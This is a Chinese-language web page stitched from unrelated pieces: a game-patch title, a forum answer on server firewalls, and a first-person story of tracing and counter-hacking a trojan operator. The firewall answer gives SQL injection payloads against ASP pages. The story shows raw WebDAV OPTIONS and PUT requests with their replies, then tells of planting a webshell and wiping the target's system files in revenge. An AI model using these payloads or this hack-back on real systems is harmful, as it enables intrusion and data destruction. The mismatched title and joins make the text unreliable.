受孕2汉化补丁2.0:服务器上的天网防火墙如何设置才能让它提供服务．

首选受到攻击不是防火墙就能解决的。
第一、防火墙只是辅助软件，并不智能。不能分别出是访问者还是攻击者，只能一味拒绝。并不是好的东西，除非有些产品能防DDOS攻击的。

第二、受攻击分2种，DDOS（拒绝服务式攻击）一种是脚本攻击。如果你安装的网站版本存在漏洞，哪么可以是从脚本攻击。比如最最常见的SQL注入。

如一个查询数据库的SQL语句如下
"Select * From [User] Where [ID]="&ID
如果这个ID变量值没有经过一些处理和验证，并过滤掉一些非法字符哪么会存在所谓的脚本攻击

比如abc.asp?ID=2

我们改成
abc.asp?ID=2'
这样ID就成了 2'而在SQL查询中的'单引号是字符串识别，现在就是等于2后面有个字符串，可是要2个单引中间才是字符串，现在只有一个单引所以会提示未关闭的单引号错误。

利用起来就是
abc.asp?ID=2%20And%201>=(Select%20Top%201*%20From%20Admin)

这样SQL句语变成了

Select * From [User] Where [ID]=2 And 1>=(Select Top 1 * From Admin)

这样攻击者就可以取得是否存在Admin这个表。如果存在可进一步猜解密码。
详细的SQL注入请自行搜索

上传漏洞～
很多上传程序没检查文件名，变成了所有类型都可上传，攻击者上传一个ASP木马，对服务器进行安全探测，如果服务器安全设置简单，哪么可以取得服务器的最高权限，即为管理员权限。

或是有些上传的程序检查文件名不严格，通过欺骗上传到ASP木马，一样有危险。

解决是添加SQL防注入，上传的检查文件名要严格，不允许ASP、ASA、CER、CDX等文件上传。如果主机支持ASP.NET也要禁掉ASPX、ASAX这样的ASP.NET文件名

添加防DDOS防火墙。

设置服务器安全

基本完成～

其实在域名解析后，控制这的IP就已经暴露了，继续让木马工作的原因是为了确认控制者在不在线。既然在线，那就好办了，因为那些电影是打开一个固定IP的网页木马的，由此可推断控制者必定属于这三种情况之一：
1. 控制者的IP是静态固定的，而且开着WEB服务以便让受害者下载木马
2. 控制者IP是动态的，但是通过动态更新灰鸽子调用的域名来完成同步更新下载木马的IP，这样也必须开着WEB服务
3. 木马下载的地方与控制者无关，控制者是入侵了某个网站而放上去的木马

前两种情况对我有利，因为这样一来，所有的数据流都是从控制者那里直接来的，如果控制者的WEB服务存在漏洞，我便可以反向入侵他，如果是最后一种，那只能另外想办法，毕竟能被入侵的网站应该也不会是什么防御措施很好的网站，我同样可以有机会入侵。

为了确认控制者是不是用自己机器做猎杀潜艇，我直接在IE浏览器里输入http://入侵者IP/RMVB.exe，还记得前面IRIS监听到的数据吗？这个就是木马的下载地址。过了一会儿，IE弹出了下载窗口，控制者符合前两种情况！我马上开了扫描器，发现控制者开了4个端口：80、135、139、8000，WEB服务为IIS 5.1，扫描不到一般漏洞。

幕后黑手终于浮上了水面，现在剩下的事情，就是入侵技术的对抗了。

四.通过IIS写权限进行反向入侵

根据舍友提供的信息得知入侵者是通过卡盟这款P2P电影共享工具实现的电影种马，如此一来，受入侵者危害的人数可能会很多，必须想办法阻止他才行！但是根据X-Scan的扫描报告推测，入侵者的机器是打了所有补丁的Windows XP系统（由IIS版本号可以推测，Win2000为5.0，XP为5.1，2003为6.0），只开了很少的端口，灰鸽子开的端口没法入侵，也不可能进行NetBIOS和IPC$入侵，那么唯一可以突破的可能性只有WEB服务了，可是用 IE打开却是“该站点未配置”提示，显然入侵者做WEB服务只是为了挂个木马文件让受害者下载，上面不可能存在论坛之类可以突破的东西，难道只能放弃？我不甘心，查阅一些关于IIS的技术资料后发现一个重要的术语：“IIS写权限”！

这里我简单描述一下什么是“写权限”，它是由当年引发大漏洞的WebDAV组件提供的服务器扩展功能，用于直接向服务器目录写入文件，为管理员执行某些远程操作提供了方便，但是同时也给服务器带来了安全隐患，如果运气好，一台没有进行配置的IIS是开放匿名写权限的，入侵者可以向WEB目录写入一些带有危害的文件，例如WebShell脚本等。

首先测试入侵者有没有专门配置过IIS，如果WebDAV被关闭，那么一切都没戏了……打开Telnet进入对方80端口，输入：
OPTIONS / HTTP/1.1
Host: www.s8s8.net

两次回车后返回以下数据：
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 12 Jul 2005 03:39:50 GMT
MS-Author-Via: DAV
Content-Length: 0
Accept-Ranges: none
DASL:
DAV: 1, 2
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIN
D, PROPPATCH, LOCK, UNLOCK, SEARCH
Allow: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
Cache-Control: private

服务器开了WebDAV且支持PUT，这是“写权限”的基本，接下来再进一步验证是否打开了“写权限”，Telnet输入：
PUT /file.txt HTTP/1.1
Host: 入侵者IP
Content-Length: 1

返回：
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.1
Date: Tue, 12 Jul 2005 04:23:55 GMT

输入1个字符后，回应如下:

HTTP/1.1 201 Created
Server: Microsoft-IIS/5.1
Date: Tue, 12 Jul 2005 04:24:12 GMT
Location: http:// 入侵者IP /file.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND,
PROPPATCH, SEARCH, LOCK, UNLOCK

服务器支持“写权限”，既然如此，就让我来给它放个WebShell吧！使用SuperHei的iiswrite.pl脚本把网络上流传已久的那个经典写文件后门放了上去，再用它写入我修改过的海洋顶端ASP木马（限于篇福，这里就不写出来了），经过一番搜索，发现了他的电影目录，估计全部被加木马处理过了，因此全部删除，然后清理了系统的重要文件和启动文件，这样一来，他下次开机就会发现系统已经瘫痪，让他尝尝害人者终害己的滋味！

连续几天下来宿舍的网络再也没有断流过，一切都恢复正常了。而那些电影文件由于被入侵者设置过，要改回来太麻烦（当然也不是不能改），所以要那舍友删除了，至此后门危机解除。

五.回溯

1.电影文件传播木马的真相

一些读者可能会觉得可怕，连电影文件也会带毒，那以后还怎么看电影？我要如何检查电影文件是不是感染了病毒？别慌，这并不是什么高深的“感染技术”，而是RealMedia格式文件自带的被称为“事件”的功能引起的问题，这个功能让影片播放到事先设定好的时间段的时候自动打开某个网页，我不知道Real公司到底在想什么，但如今这个功能被大量用于木马传播已经成为现实：入侵者做好一个网页木马，然后修改Real格式的电影文件，加入在某个时段打开这个网页木马URL的事件，然后就可以安心的守株待兔了。强调一下，电影文件本身是没有木马的，它只是携带了一个打开网页的事件而已，问题在于它并不知道这个网页是否有害！

2.灰鸽子的隐藏原理

灰鸽子在一般情况下是无法发现的，因为这个木马的防护措施是通过拦截API调用让系统无法枚举域它有关的信息，所以无论是从资源管理器还是进程管理器，你都无法发现它的文件体和进程，也许它唯一暴露自身的地方就是服务管理器里的服务列表，但这里稍加改动后其实一样可以隐藏，另外因为它是反弹木马（所谓反弹木马，就是服务端主动去连接控制端的木马），因此也不会开放端口，这样一来，灰鸽子可以迷惑许多用户，使得他们在不知不觉中受害。但是这种隐藏方法有一个最大的失效环境，那就是安全模式或者非Windows系统，因为即使它的HOOK功能再强大也必须要由一个EXE把相关功能模块DLL载入内存执行，否则它只能是废物一滩，（还记得吗，DLL木马的原理），而且杀毒厂商会很快就能查杀新版木马，因此读者无需过于害怕，舍友感染的灰鸽子是因为被另行加壳并改了些设置导致特征码变化而查不出来，这只是片面现象。

3.总结

这次事件的曝光是因为Modem防火墙的级别过高，服务端又处于一个LAN环境，因而导致木马与外部交互的时候被Modem拦截并造成Modem超负荷（虽然具体详情我也无法得知，但正是由于这款芯片存在bug的Modem，才避免了一次木马的暗渡陈仓，也许换作别的Modem，木马已经犯下罪恶了），因此，设置Modem防火墙是必要工作！

由于木马是通过带有IE漏洞的网页下载而来的，而IE的漏洞永远也补不完，因此不能武断的说“定期去修补系统漏洞”，因为已经有过实际案例证明一些IE的漏洞补了也等于没补，所以能给读者的建议唯有时常留意自己系统里多了什么文件和服务之类的，以及一些异常现象，掌握基本的入侵检测技术方能确保自己在这个混乱的网络中不受侵害！

连这都不知道?你还做服务器干什么